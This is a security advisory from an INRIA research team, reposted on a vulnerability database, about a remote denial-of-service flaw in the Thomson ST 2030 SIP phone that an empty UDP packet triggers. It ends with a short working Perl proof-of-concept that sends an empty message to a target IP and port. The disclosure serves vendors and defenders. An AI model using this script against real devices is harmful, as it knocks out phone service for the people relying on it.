Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17909
HistoryAug 28, 2007 - 12:00 a.m.

[Full-disclosure] DOS vulnerability on Thomson SIP phone ST 2030 using an empty packet

2007-08-2800:00:00
vulners.com
11

MADYNES Security Advisory : Remote DOS on Thomson SIP phone ST 2030 using
an empty packet

Date of Discovery 15 February, 2007

Vendor was notified on 1 March 2007

ID: KIPH10

Synopsis

After sending an empty message the device looks functional but in fact does
not respond to any event provoking a DoS

Background

SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP
signalization. SIP is an ASCII based INVITE message is used to initiate and
maintain a communication session.

Affected devices: Thomson SIP phone ST 2030

Impact :

A malicious user can remotely crash and perform a denial of service attack
by sending one crafted void SIP message.

Resolution

Fixed software will be available from the vendor and customers following
recommended best practices (ie segregating VOIP traffic from data) will be
protected from malicious traffic in most situations.

Credits

Humberto J. Abdelnur (Ph.D Student)

Radu State (Ph.D)

Olivier Festor (Ph.D)

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see
http://hal.inria.fr/inria-00166947/en),

Configuration of our device:

Software Version: v1.52.1

IP-Address obtained by DHCP as 192.168.1.106

User name : thomson

To run the exploit the file thomson-2030-pl should be launched (assuming our
configurations) as:

POC Code:

perl thomson-2030.pl 192.168.1.106 5060 thomson

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

    Proto=&gt;&#39;udp&#39;,

    PeerAddr=&gt;$ARGV[0]&#41;;

$msg = "";

$socket->send($msg);